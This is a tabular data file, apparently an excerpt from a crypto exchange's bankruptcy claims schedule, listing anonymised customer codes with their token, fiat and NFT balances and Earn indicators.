| 07356660 | | USD[315.08] | | |
| 07356662 | | DOGE[23.80976417], USD[0.00] | | |
| 07356663 | | USD[10.00] | | |
| 07356664 | | USD[10.00] | | |
| 07356665 | | CUSDT[2], DOGE[1442.5876836], TRX[3], USD[0.00] | | |
| 07356667 | | USD[10.00] | | |
| 07356668 | | CUSDT[1], DOGE[1], ETH[0], TRX[1], USD[0.00] | Yes | |
| 07356669 | | USD[10.00] | | |
| 07356670 | | USD[10.00] | | |
| 07356672 | | BRZ[3], CUSDT[21], DOGE[0], TRX[3], USD[0.01], USDT[2.21364459] | Yes | |
| 07356673 | | BAT[1], BRZ[2], CUSDT[5], DOGE[8247.46354136], GRT[1], USD[0.00], USDT[3] | | |
| 07356674 | | USD[10.00] | | |
| 07356675 | | BTC[0], ETHW[.6993324], USD[3.43] | | |
| 07356677 | | USD[10.00] | | |
| 07356678 | | BF_POINT[600], DOGE[26.24458404], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07356679 | | CUSDT[5], DOGE[19.93511038], SOL[2.21938586], TRX[1], USD[0.00] | Yes | |
| 07356680 | | USD[10.00] | | |
| 07356681 | | DOGE[5.27278124], USD[0.25] | | |
| 07356682 | | USD[10.00] | | |
| 07356683 | | USD[10.00] | | |
| 07356684 | | USD[0.00] | | |
| 07356685 | | USD[10.00] | | |
| 07356686 | | BAT[1], BRZ[1], TRX[3], USD[0.01] | | |
| 07356687 | | DOGE[27.65850278], USD[0.00] | | |
| 07356688 | | USD[10.00] | | |
| 07356691 | | DOGE[37.12676164], USD[0.00] | Yes | |
| 07356692 | | BRZ[1], CUSDT[2], DOGE[1.47437392], LINK[.00059541], TRX[3], USD[0.01] | | |
| 07356693 | | BAT[1], BTC[.0102237], CUSDT[7], DOGE[10921.41224781], SOL[1], TRX[4], USD[0.00] | | |
| 07356694 | | USD[10.00] | | |
| 07356695 | | USD[10.00] | | |
| 07356697 | | USD[10.00] | | |
| 07356698 | | USD[10.00] | | |
| 07356699 | | USD[10.00] | | |
| 07356700 | | BTC[.00276601], CUSDT[2], SHIB[1], TRX[1], USD[0.00] | | |
| 07356701 | | USD[10.00] | | |
| 07356702 | | DOGE[79.5190244], USD[0.00] | | |
| 07356703 | | USD[10.00] | | |
| 07356704 | | DOGE[7919.74772202], USD[0.00] | Yes | |
| 07356705 | | CUSDT[4], ETH[0], USD[0.00] | | |
| 07356706 | | USD[10.00] | | |
| 07356707 | | BRZ[2], DOGE[1281.39303875], TRX[1], USD[11.61] | | |
| 07356708 | | CUSDT[3], DOGE[589.03384064], TRX[3683.87792131], USD[0.00] | | |
| 07356709 | Contingent, Disputed | CUSDT[1], DOGE[0], TRX[2], USD[0.01] | | |
| 07356710 | | BTC[0], DOGE[0], ETH[0], ETHW[0], LTC[0], SOL[3.60552491], SUSHI[0], TRX[1], USD[0.00] | | |
| 07356711 | | BTC[.01474433], USD[10.00] | | |
| 07356712 | | DOGE[0], USD[0.01] | | |
| 07356713 | | BTC[0], DOGE[55.50572333], SHIB[8777.52919623], USD[0.00], USDT[0] | Yes | |
| 07356714 | | USD[10.00] | | |
| 07356715 | | BCH[0], BRZ[1], BTC[0], CUSDT[2], DOGE[0], ETH[0], GRT[0], SUSHI[0], TRX[4], UNI[0], USD[0.01], USDT[0] | Yes | |
| 07356716 | | USD[10.00] | | |
| 07356717 | | USD[10.00] | | |
| 07356718 | | DOGE[1.82125725], USD[0.01] | | |
| 07356719 | | USD[10.00] | | |
| 07356720 | | DOGE[17.52626369], USD[4.00] | | |
| 07356721 | | BTC[0], CUSDT[4], DOGE[0], TRX[1], USD[0.01] | Yes | |
| 07356722 | | USD[10.00] | | |
| 07356723 | | BRZ[2], CUSDT[10], GRT[40.759536], SHIB[1], TRX[2], USD[0.00], USDT[0.82923922] | Yes | |
| 07356724 | | USD[10.00] | | |
| 07356725 | | CUSDT[8], DOGE[149.9192427], TRX[2], USD[0.00], USDT[0.00000001] | | |
| 07356726 | | CUSDT[5], DOGE[.22483148], USD[0.00] | | |
| 07356727 | | CUSDT[2], DOGE[6045.99654807], USD[0.00] | Yes | |
| 07356730 | | BTC[.00056223], CUSDT[6], DOGE[92.70618879], TRX[1], USD[0.00] | | |
| 07356731 | | USD[10.00] | | |
| 07356732 | | USD[10.00] | | |
| 07356733 | | ETH[.0030106], ETHW[.02159843], GRT[527.19942255], SHIB[236.53222013], USD[0.00] | Yes | |
| 07356734 | | CUSDT[3], DOGE[1407.30221427], USD[0.00] | | |
| 07356735 | | USD[10.00] | | |
| 07356736 | | USD[10.00] | | |
| 07356737 | | CUSDT[4], DOGE[.00006829], USD[0.00] | | |
| 07356738 | | USD[10.00] | | |
| 07356739 | | USD[10.00] | | |
| 07356740 | | USD[10.00] | | |
| 07356741 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07356742 | | USD[10.00] | | |
| 07356743 | | DOGE[17.46006202], USD[0.00] | Yes | |
| 07356744 | | BCH[0], BTC[0], DOGE[0], USD[0.07] | | |
| 07356745 | | USD[10.00] | | |
| 07356746 | | DOGE[1], USD[0.00] | | |
| 07356747 | | BRZ[1], USD[0.01] | | |
| 07356748 | | USD[10.00] | | |
| 07356749 | | USD[10.00] | | |
| 07356751 | | DOGE[23.2798886], USD[0.00] | | |
| 07356752 | | CUSDT[1], DOGE[2.66016588], SHIB[2], TRX[1], USD[0.00], YFI[.0002263] | Yes | |
| 07356753 | | DOGE[1192.54915211], USD[10.00] | | |
| 07356754 | | DOGE[1.67136771], USD[0.00], USDT[1] | | |
| 07356756 | | USD[10.00] | | |
| 07356757 | | USD[10.00] | | |
| 07356758 | | ETH[.00496316], ETHW[.00496316], USD[0.00] | | |
| 07356759 | | BRZ[2], BTC[0], CUSDT[8], DOGE[0], LTC[0], USD[0.23] | | |
| 07356760 | | USD[0.00], USDT[0] | | |
| 07356761 | | CUSDT[6], USD[0.00] | Yes | |
| 07356763 | | CUSDT[1], DOGE[145.28005253], TRX[180.57513541], USD[0.00] | | |
| 07356764 | | USD[10.00] | | |
| 07356765 | | USD[10.00] | | |
| 07356766 | | USD[10.00] | | |
| 07356767 | | DOGE[1.78709996], TRX[0], USD[0.00] | | |
| 07356768 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07356769 | | USD[10.00] | | |
| 07356770 | | DOGE[134.35144861], USD[500.00] | | |
| 07356771 | | DOGE[0], SHIB[134.61263787], USD[0.00] | Yes | |
| 07356772 | | USD[10.00] | | |
| 07356773 | | BRZ[0], BTC[0], DOGE[0], USD[0.00] | | |
| 07356774 | | AVAX[1.21789073], BRZ[1], CUSDT[1], DOGE[949.26136891], ETH[0], GRT[1.00367791], NFT (31341296654721432 5/FTX - Off The Grid Miami #1008)[1], NFT (34497674112522280 4/Entrance Voucher #1798)[1], SHIB[1], SOL[0], SUSHI[38.07648977], TRX[2], USD[0.00], YFI[0] | Yes | |
| 07356776 | | CUSDT[13], DOGE[18.63481638], GRT[1.00404471], USD[0.01] | Yes | |
| 07356777 | | USD[10.00] | | |
| 07356778 | | USD[10.00] | | |
| 07356779 | | DOGE[1], TRX[1], USD[50.53] | | |
| 07356780 | | USD[10.00] | | |
| 07356781 | | DOGE[1], USD[10.29] | | |
| 07356782 | | CUSDT[1], DOGE[1], ETH[.01080729], ETHW[.01067049], USD[0.01] | Yes | |
| 07356783 | | BRZ[1], DOGE[1511.27920565], SUSHI[.5153133], USD[0.00] | | |
| 07356784 | | BTC[.0002219], USD[0.00] | | |
| 07356785 | | TRX[1], USD[0.00] | | |
| 07356786 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07356787 | | USD[0.00] | | |
| 07356788 | | USD[10.00] | | |
| 07356789 | | DOGE[2419.2135979], USD[10.00] | | |
| 07356790 | | BRZ[1], CUSDT[7], DOGE[46.4132966], TRX[3], USD[51.92] | | |
| 07356791 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07356792 | | BAT[82.33687802], CUSDT[2], DOGE[671.43738862], LINK[2.89582839], SUSHI[5.95624093], TRX[215.9549552], USD[0.08] | | |
| 07356793 | | CUSDT[4], DOGE[.07771481], TRX[1], USD[0.00] | | |
| 07356794 | | DOGE[2.02850626], USD[0.00] | | |
| 07356795 | | CUSDT[1], DOGE[.81695889], TRX[3], USD[15.09] | | |
| 07356796 | | BTC[0], DOGE[1], TRX[1], USD[10.00] | | |
| 07356797 | | USD[10.00] | | |
| 07356798 | | BRZ[2], BTC[0], CUSDT[3], TRX[1], USD[0.00], USDT[0] | | |
| 07356799 | | DOGE[137.36469405], TRX[1], USD[0.00] | | |
| 07356800 | | USD[10.00] | | |
| 07356801 | | USD[10.00] | | |
| 07356802 | | USD[10.00] | | |
| 07356803 | | DOGE[0], TRX[0], USD[0.02] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07356804 | | USD[10.00] | | |
| 07356805 | | USD[10.00] | | |
| 07356806 | | BTC[.00017816], DOGE[26.96389753], USD[0.00] | | |
| 07356807 | | USD[0.00] | | |
| 07356808 | | USD[10.00] | | |
| 07356810 | | USD[10.00] | | |
| 07356811 | | USD[10.00] | | |
| 07356812 | | USD[10.00] | | |
| 07356813 | | USD[11.01] | Yes | |
| 07356814 | | USD[10.00] | | |
| 07356816 | | CUSDT[1], DOGE[9], TRX[2], USD[28.66], USDT[0] | | |
| 07356817 | | USD[10.00] | | |
| 07356818 | | USD[20.00] | | |
| 07356819 | | DOGE[2.92394121], USD[0.02] | | |
| 07356820 | | CUSDT[2], DOGE[19.90631333], TRX[1], USD[1.22] | | |
| 07356821 | | BAT[1], BRZ[2], BTC[.00389488], CUSDT[5], DOGE[795.05636258], ETH[.17204452], ETHW[.17204452], GRT[218.85295656], LINK[6.37248545], TRX[4], USD[0.00], USDT[1] | | |
| 07356822 | | USD[10.00] | | |
| 07356823 | | USD[0.01] | | |
| 07356824 | | USD[0.00] | | |
| 07356825 | | USD[10.00] | | |
| 07356826 | | USD[10.00] | | |
| 07356827 | | DOGE[0], ETH[0], SUSHI[0], USD[0.01], USDT[0] | | |
| 07356828 | | DOGE[.24043129], USD[0.00], USDT[1.09992442] | Yes | |
| 07356829 | | USD[10.00] | | |
| 07356830 | | BTC[0], DOGE[0], ETH[0.00000001], ETHW[0], NFT [557899828534485732/Humpty Dumpty #644][1], SOL[0], USD[0.00] | | |
| 07356831 | | BAT[1.0165555], CUSDT[3], DOGE[19261.69500657], ETH[.0083607], ETHW[.00825118], SHIB[9685747.51097908], TRX[2], USD[0.00], USDT[1.10397998] | Yes | |
| 07356832 | | USD[10.22] | | |
| 07356833 | | USD[0.01] | | |
| 07356834 | | DOGE[54.80706761], USD[0.00] | | |
| 07356836 | | BTC[0], ETH[0], SHIB[1], SOL[0.00000093], TRX[0], USD[0.00] | Yes | |
| 07356837 | | USD[0.01], USDT[0.00000001] | | |
| 07356839 | | CUSDT[1], USD[0.01] | | |
| 07356840 | | USD[10.00] | | |
| 07356843 | | BAT[1.0165555], BRZ[4], BTC[.01545699], CUSDT[13], ETH[.12346217], ETHW[.12229158], SHIB[1391576.66253644], TRX[5], USD[86.75], USDT[0] | Yes | |
| 07356844 | | USD[10.00] | | |
| 07356845 | | DOGE[0.00695314], SHIB[7], USD[0.00] | Yes | |
| 07356846 | | BRZ[0], GRT[1], TRX[1], USD[0.00] | | |
| 07356847 | | DOGE[1], TRX[1], USD[25.63] | | |
| 07356848 | | BRZ[1], DOGE[1785.75170245], TRX[1], USD[32.47] | Yes | |
| 07356849 | | USD[10.00] | | |
| 07356850 | | USD[10.00] | | |
| 07356852 | | BRZ[1], BTC[0], CUSDT[1], DOGE[.0004845], SOL[.00026138], TRX[2], USD[0.01] | | |
| 07356853 | | USD[10.00] | | |
| 07356854 | | USD[10.00] | | |
| 07356855 | | DOGE[123.10551385], USD[0.00] | | |
| 07356856 | | USD[10.00] | | |
| 07356857 | | BRZ[2], BTC[0], CUSDT[1], TRX[1], USD[0.00], USDT[0.00000001] | | |
| 07356859 | | BRZ[2], CUSDT[9], DOGE[1184.46275842], TRX[3], USD[0.00] | | |
| 07356860 | | USD[10.00] | | |
| 07356861 | | SHIB[89.7873769], USD[0.02] | | |
| 07356862 | | BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], SHIB[27579251.4800554], TRX[2], USD[0.00], USDT[0] | | |
| 07356863 | | BRZ[10], CUSDT[22], DOGE[27], ETH[0], ETHW[0], SUSHI[0], TRX[30], USD[0.00], USDT[4] | | |
| 07356864 | | SOL[0], USD[0.24] | | |
| 07356867 | | DOGE[0], USD[0.01] | Yes | |
| 07356868 | | USD[0.00] | | |
| 07356869 | | BTC[0.00144494], CUSDT[2], ETH[.08236471], ETHW[.08135078], USD[0.00] | Yes | |
| 07356870 | | USD[10.00] | | |
| 07356871 | | CUSDT[1], DOGE[1], SHIB[49817.6680094], SOL[0.19121984], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07356872 | | BTC[0], USD[0.08] | | |
| 07356873 | | USD[10.00] | | |
| 07356874 | | BTC[0], DOGE[0], ETH[0] | | |
| 07356875 | | USD[10.00] | | |
| 07356876 | | BAT[1], BRZ[1], CUSDT[10], DOGE[1015.11682444], TRX[1], USD[0.00] | | |
| 07356877 | | BRZ[1], CUSDT[1], DOGE[0.18325969], TRX[3], USD[0.00] | | |
| 07356878 | | USD[0.01] | | |
| 07356880 | | BTC[0], USD[0.02] | | |
| 07356883 | | USD[10.00] | | |
| 07356884 | | NFT (449277430931714810/Entrance Voucher #2978)[1], USD[0.00] | | |
| 07356886 | | USD[10.00] | | |
| 07356887 | | BAT[0], CUSDT[1], DOGE[0], LTC[0], SUSHI[0], TRX[1], USD[0.00] | Yes | |
| 07356888 | | USD[0.08] | | |
| 07356889 | | BRZ[1], USD[0.01] | | |
| 07356890 | | CUSDT[1], DOGE[4820.8361387], SHIB[2193374.01325996], TRX[1], USD[0.00] | Yes | |
| 07356891 | | USD[20.00] | | |
| 07356892 | | USD[10.00] | | |
| 07356893 | | CUSDT[3], ETH[0], SUSHI[0], USD[0.01] | | |
| 07356894 | | CUSDT[1], DOGE[.00001073], USD[0.01] | | |
| 07356895 | | DOGE[1], USD[0.00] | | |
| 07356896 | | USD[10.00] | | |
| 07356898 | | DOGE[1], GRT[1135.01733947], TRX[2], USD[10.00] | | |
| 07356900 | | USD[10.00] | | |
| 07356901 | | USD[0.01] | | |
| 07356902 | | BTC[.00016772], USD[0.00] | | |
| 07356903 | | DOGE[.45762974], USD[0.00] | | |
| 07356904 | | USD[10.00] | | |
| 07356905 | | USD[10.00] | | |
| 07356906 | | USD[10.00] | | |
| 07356908 | | USD[10.00] | | |
| 07356909 | | USD[0.00] | | |
| 07356910 | | CUSDT[1], USD[0.29] | | |
| 07356912 | | BAT[0], DOGE[0.00876934], SHIB[1], TRX[0], USD[0.00] | Yes | |
| 07356914 | | USD[10.00] | | |
| 07356916 | | USD[10.00] | | |
| 07356918 | | BRZ[2], CUSDT[1], USD[112.76] | | |
| 07356919 | | BRZ[1], CUSDT[1], DOGE[48.96891921], USD[5.09] | | |
| 07356920 | | USD[10.00] | | |
| 07356921 | | BTC[.00020436], USD[0.00] | | |
| 07356924 | | USD[0.00], USDT[12.62347764] | | |
| 07356925 | | DOGE[.00001562], TRX[2], USD[0.00] | | |
| 07356926 | | DOGE[11120.00006171], SHIB[7458813.46676689], USD[0.00], USDT[0] | Yes | |
| 07356927 | | USD[10.00] | | |
| 07356928 | | USD[10.00] | | |
| 07356929 | | USD[10.00] | | |
| 07356930 | | BRZ[4], CUSDT[4], DOGE[6], TRX[3], USD[0.01], USDT[1] | | |
| 07356933 | | BAT[0], BCH[.05], CUSDT[1], DOGE[0], ETH[0], LTC[0.43300000], TRX[3], USD[0.00] | | |
| 07356934 | | BTC[.00032926], USD[0.00] | | |
| 07356935 | | BRZ[1], BTC[0], CUSDT[7], DOGE[0], TRX[.27375057], USD[0.26] | | |
| 07356936 | | CUSDT[10], DOGE[4513.75468738], ETH[.01991484], ETHW[.01991484], TRX[146.41107839], USD[0.00] | | |
| 07356939 | | DOGE[134.23562771], USD[0.00] | | |
| 07356940 | | BRZ[1], CUSDT[5], DOGE[16750.38770519], SOL[1], TRX[2], USD[807.02] | | |
| 07356941 | | SOL[1.04906914], USD[0.00] | | |
| 07356942 | | USD[10.00] | | |
| 07356943 | | BRZ[1], CUSDT[3], DOGE[69.42620468], TRX[1], USD[105.33] | | |
| 07356944 | | USD[10.00] | | |
| 07356945 | | BRZ[3], CUSDT[5], KSHIB[831.63487808], SHIB[1], TRX[6], USD[0.00], USDT[1.10931624] | Yes | |
| 07356949 | | CUSDT[1], DOGE[.00022258], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07356952 | | USD[0.00] | | |
| 07356953 | | CUSDT[1], USD[15.88] | | |
| 07356954 | | USD[10.09] | Yes | |
| 07356955 | | ETH[.00161674], ETHW[.00160306], NFT (342773172221443537/ALPHA:RONIN #1259)[1], NFT (358922447191703867/Australia Ticket Stub #1601)[1], NFT (472554790718032807/Divine Soldier #512)[1], SHIB[34824.94980830], USD[0.00] | Yes | |
| 07356956 | | BAT[2], BRZ[6], BTC[0], CUSDT[10], DOGE[0], TRX[9], USD[0.00], YFI[0] | | |
| 07356957 | | BAT[1], BRZ[1], CUSDT[2], DOGE[2], ETH[0], GRT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07356959 | | BRZ[.21825769], USD[9.34] | | |
| 07356960 | | USD[0.00] | | |
| 07356962 | | BRZ[1], CUSDT[1], GRT[1], TRX[167.88559434], USD[0.00], USDT[0] | | |
| 07356963 | | USD[0.00] | | |
| 07356964 | | BCH[1.89734748], BRZ[3], CUSDT[18], DOGE[1022.66303537], GRT[2], LTC[3.20196856], SHIB[5570.25483915], SOL[16.4838428], TRX[7.70036895], USD[0.02], USDT[1] | | |
| 07356965 | | DOGE[2], GRT[4.27753982], SOL[3.76046655], TRX[461.47865016], USD[0.00] | | |
| 07356966 | | USD[10.00] | | |
| 07356969 | | USD[10.00] | | |
| 07356971 | | USD[10.00] | | |
| 07356972 | | DOGE[172.73585945], USD[0.00] | | |
| 07356973 | | BAT[0], BRZ[5.07952967], BTC[0], CUSDT[31], DOGE[2.00249413], ETH[0.22115119], ETHW[0.22093303], GRT[950.89456482], KSHIB[0], LINK[0], LTC[2.33483758], NFT (289584881017290178/StarAtlas Anniversary)[1], NFT (308454898553288210/Frog #4356)[1], NFT (341692162473213080/Sigma Shark #2578)[1], NFT (350661029395850918/Golden bone pass)[1], NFT (361913585379647327/StarAtlas Anniversary)[1], NFT (371759690957367539/Frog #3504)[1], NFT (377572063858200956/StarAtlas Anniversary)[1], NFT (388391716492474550/StarAtlas Anniversary)[1], NFT (397462596592081959/Tommy Gun)[1], NFT (402332465600967109/StarAtlas Anniversary)[1], NFT (458223016553822363/Cyber Frogs Ramen)[1], NFT (473814950465069568/StarAtlas Anniversary)[1], NFT (573469849591356807/StarAtlas Anniversary)[1], SOL[0], TRX[1], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07356975 | | USD[10.00] | | |
| 07356976 | | USD[10.00] | | |
| 07356977 | | USD[10.00] | | |
| 07356978 | | BTC[0], DOGE[.83418], LTC[.0031715], SOL[.019511], TRX[.42105], USD[0.00], USDT[0] | | |
| 07356979 | | USD[10.00] | | |
| 07356980 | | BRZ[1], CUSDT[6], DOGE[423.79795924], TRX[2], USD[0.00], USDT[1] | | |
| 07356981 | | BRZ[1], DOGE[34996.02738473], GRT[1], TRX[1], USD[1000.00] | | |
| 07356983 | | NFT (542572057440125851/Coachella x FTX Weekend 1 #2131)[1] | | |
| 07356984 | | USD[10.00] | | |
| 07356985 | | ETH[0], SOL[.00000008], TRX[17.71908675], USD[0.00] | | |
| 07356986 | | USD[10.00] | | |
| 07356987 | | CUSDT[5.59529243], USD[0.00] | | |
| 07356989 | | BAT[66.67319122], CUSDT[3], DOGE[635.5287427], USD[0.00] | Yes | |
| 07356991 | | CUSDT[1], DOGE[2.48248156], USD[0.00], USDT[0] | | |
| 07356992 | | CUSDT[1], TRX[.00009019], USD[0.00], USDT[0] | | |
| 07356996 | | BTC[0], USD[0.46] | | |
| 07356997 | | USD[10.00] | | |
| 07356998 | | USD[10.00] | | |
| 07356999 | | USD[0.00] | Yes | |
| 07357000 | | BRZ[1], CUSDT[1], ETH[.00000001], ETHW[0], KSHIB[1513.28879436], NFT (441981780312903828/CREEPY )[1], NFT (512615012434131347/CREEPY MINI  #2)[1], SHIB[280409.39967734], SUSHI[4.52022439], TRX[1019.14195648], USD[5.00] | Yes | |
| 07357001 | | BRZ[4], CUSDT[7], DOGE[1.38151354], TRX[.59286225], USD[0.01], USDT[1] | | |
| 07357002 | | BRZ[1], USD[0.00] | | |
| 07357003 | | BRZ[1], USD[0.00] | | |
| 07357005 | | USD[10.00] | | |
| 07357008 | | DOGE[143.72629683], USD[0.00] | | |
| 07357010 | | BRZ[1], DOGE[25050.46475322], USD[0.00] | | |
| 07357011 | | USD[510.00] | | |
| 07357012 | | SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07357013 | | USD[0.00] | | |
| 07357014 | | USD[10.00] | | |
| 07357015 | | BTC[.00020048], CUSDT[3], DOGE[1000.44815666], MATIC[10.64134921], SHIB[1], TRX[77.43051298], USD[0.00] | Yes | |
| 07357016 | | CUSDT[5], DOGE[1], KSHIB[388.86964944], USD[0.00] | Yes | |
| 07357017 | | USD[10.00] | | |
| 07357018 | | USD[0.33] | | |
| 07357019 | | TRX[228.1295572], USD[0.00] | Yes | |
| 07357020 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07357021 | | CUSDT[1], USD[19.23] | | |
| 07357023 | | ETH[.46149621], ETHW[.46129834], SHIB[3], SUSHI[3.80567764], USD[0.00] | Yes | |
| 07357024 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07357025 | | BTC[.00001829], DOGE[5684.07928459], ETH[.01539186], ETHW[.01539186], UNI[1], USD[0.00], USDT[0] | | |
| 07357026 | | BTC[0], DOGE[0], MATIC[32.49808150], SOL[0], TRX[0], USD[0.00], YFI[0] | | |
| 07357027 | | BAT[1], BRZ[6], BTC[0], CUSDT[140], GRT[1], TRX[10], USD[0.01] | | |
| 07357029 | | USD[10.00] | | |
| 07357030 | | BCH[0], BTC[0], CUSDT[1], DOGE[0], ETH[0.04322072], ETHW[0.04268720], SOL[0], USD[0.00] | Yes | |
| 07357033 | | USD[10.00] | | |
| 07357034 | | USD[10.00] | | |
| 07357035 | | DOGE[1], USD[0.00] | | |
| 07357036 | | ETH[.00290774], ETHW[.0028667], USD[0.00] | Yes | |
| 07357038 | | SOL[.000477], USD[0.00] | Yes | |
| 07357039 | | USD[10.00] | | |
| 07357040 | | USD[0.00] | | |
| 07357041 | | BTC[.00032432], CUSDT[4], DOGE[43.02449307], TRX[2], USD[0.00] | | |
| 07357042 | | BAT[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07357043 | | USD[10.00] | | |
| 07357045 | | DOGE[1088.96024394], TRX[3], USD[0.00] | Yes | |
| 07357047 | | USD[10.00] | | |
| 07357048 | | BRZ[2], CUSDT[1], TRX[2], USD[0.01] | Yes | |
| 07357049 | | CUSDT[3], DOGE[.0005735], USD[0.01] | | |
| 07357050 | | USD[10.00] | | |
| 07357051 | | USD[10.00] | | |
| 07357052 | | CUSDT[2], DOGE[4991.7389973], USD[0.00] | Yes | |
| 07357053 | | USD[10.00] | | |
| 07357054 | | CUSDT[1], USD[0.04] | | |
| 07357055 | | USD[10.00] | | |
| 07357056 | | CUSDT[8], TRX[1], USD[0.03] | | |
| 07357057 | | USD[10.00] | | |
| 07357058 | | TRX[93.92154966], USD[0.00] | Yes | |
| 07357059 | | BTC[0.00027117], DOGE[0], ETH[0.00356675], ETHW[0.00356675], USD[0.00], USDT[0], YFI[0] | | |
| 07357060 | | BCH[4.10355984], BRZ[1], BTC[0], CUSDT[6], DOGE[1], TRX[1], USD[0.00], USDT[1] | | |
| 07357061 | | CUSDT[5], TRX[1], USD[0.01] | | |
| 07357062 | | CUSDT[2], DOGE[.00355182], TRX[2], USD[0.00] | Yes | |
| 07357064 | | USD[0.01] | | |
| 07357065 | | BTC[0], USD[0.00] | | |
| 07357066 | | USD[10.00] | | |
| 07357067 | | NFT (440969225801515859/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #30)[1], USD[0.00] | Yes | |
| 07357068 | | BAT[0], BRZ[1], CUSDT[17], DOGE[0], ETH[0], ETHW[0], MATIC[0.00037133], SOL[0], TRX[2], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07357069 | | BAT[0], BRZ[0], BTC[0], CUSDT[0], DOGE[0.16053119], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07357070 | | USD[0.00] | | |
| 07357071 | | BAT[28.77645562], BCH[.26639991], BRZ[1], BTC[.00183117], CUSDT[1029.66841344], DOGE[1465.06691661], SHIB[1104562.86774287], TRX[459.08684797], USD[185.03] | | |
| 07357072 | | DOGE[.89970314], USD[8.77] | | |
| 07357073 | | USD[10.00] | | |
| 07357075 | | CUSDT[1], DOGE[20.22670454], TRX[1], USD[0.51] | | |
| 07357076 | | BTC[0], DOGE[0], LINK[0], SOL[0], UNI[0], USD[0.00] | | |
| 07357077 | | CUSDT[1], DOGE[1014.04673584], TRX[2], USD[0.00] | | |
| 07357078 | | USD[10.00] | | |
| 07357079 | | USD[10.00] | | |
| 07357080 | | USD[10.00] | | |
| 07357081 | | USD[10.00] | | |
| 07357082 | | BRZ[1], DOGE[6256.11531322], TRX[.00003945], USD[0.00] | Yes | |
| 07357083 | | USD[10.00] | | |
| 07357084 | | USD[0.00] | | |
| 07357085 | | CUSDT[1], LINK[1.63909376], TRX[1], USD[0.00] | | |
| 07357086 | | BTC[0], ETH[0.00000001], ETHW[0], USD[0.37] | | |
| 07357087 | | USD[10.00] | | |
| 07357088 | | USD[10.00] | | |
| 07357089 | | BRZ[1], BTC[.00042413], CUSDT[2], DOGE[280.65129519], TRX[1], USD[0.00] | | |
| 07357090 | | BTC[.00258859], ETH[.03065279], ETHW[.03065279], SOL[3.16485872], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07357091 | | DOGE[27.11023459], USD[0.00] | | |
| 07357092 | | CUSDT[1], DOGE[753.35899784], TRX[1], USD[0.02] | | |
| 07357094 | | BRZ[1], CUSDT[3], DOGE[458.57027372], TRX[3], USD[0.01] | | |
| 07357096 | | TRX[1997.33337366], USD[0.13] | | |
| 07357097 | | DOGE[673.84084541], USD[0.55] | | |
| 07357098 | | BRZ[2.82823000], BTC[0], CUSDT[20.00005841], DOGE[0], GRT[.00002707], LTC[.00007], SOL[.0000365], TRX[2.00540443], USD[0.30] | | |
| 07357099 | | BAT[1], BRZ[1], DOGE[4], GRT[1], SHIB[1], TRX[2], USD[16683.86] | Yes | |
| 07357100 | | USD[10.00] | | |
| 07357101 | | CUSDT[2], DOGE[7663.83956021], TRX[5], USD[1582.94] | | |
| 07357103 | | USD[10.00] | | |
| 07357104 | | CUSDT[1], DOGE[30.82606121], USD[0.44] | | |
| 07357106 | | USD[10.00] | | |
| 07357107 | | CUSDT[1], TRX[2], USD[0.01] | | |
| 07357108 | | USD[0.00] | | |
| 07357109 | | CUSDT[2], DOGE[.03035598], TRX[2], USD[0.00] | | |
| 07357110 | | BTC[.00012382], DAI[8.45972857], DOGE[1153.44183313], UNI[2.45594439], USD[0.00] | Yes | |
| 07357111 | | DOGE[16.77691391], USD[0.00] | | |
| 07357112 | | BRZ[1], DOGE[0], LTC[0], TRX[1120.93289058], USD[0.00] | Yes | |
| 07357114 | | DOGE[1], USD[37.52] | | |
| 07357115 | | USD[10.00] | | |
| 07357116 | | USD[10.00] | | |
| 07357118 | | USD[10.00] | | |
| 07357120 | | DOGE[0], SUSHI[0], USD[0.01] | | |
| 07357121 | | AVAX[.28241225], CUSDT[903.43000034], DOGE[4135.87672158], ETH[.00474799], ETHW[.00474799], LTC[.14439302], SHIB[3], SOL[.18207098], TRX[8], USD[0.00] | | |
| 07357124 | | USD[10.00] | | |
| 07357125 | | USD[10.91] | Yes | |
| 07357126 | | USD[0.50], USDT[0] | | |
| 07357127 | | USD[12.00] | | |
| 07357128 | | USD[10.00] | | |
| 07357129 | | USD[10.00] | | |
| 07357130 | | USD[10.00] | | |
| 07357132 | | DOGE[1], SHIB[1.00000755], USD[0.00] | Yes | |
| 07357133 | | USD[10.00] | | |
| 07357134 | | TRX[1], USD[44.35] | | |
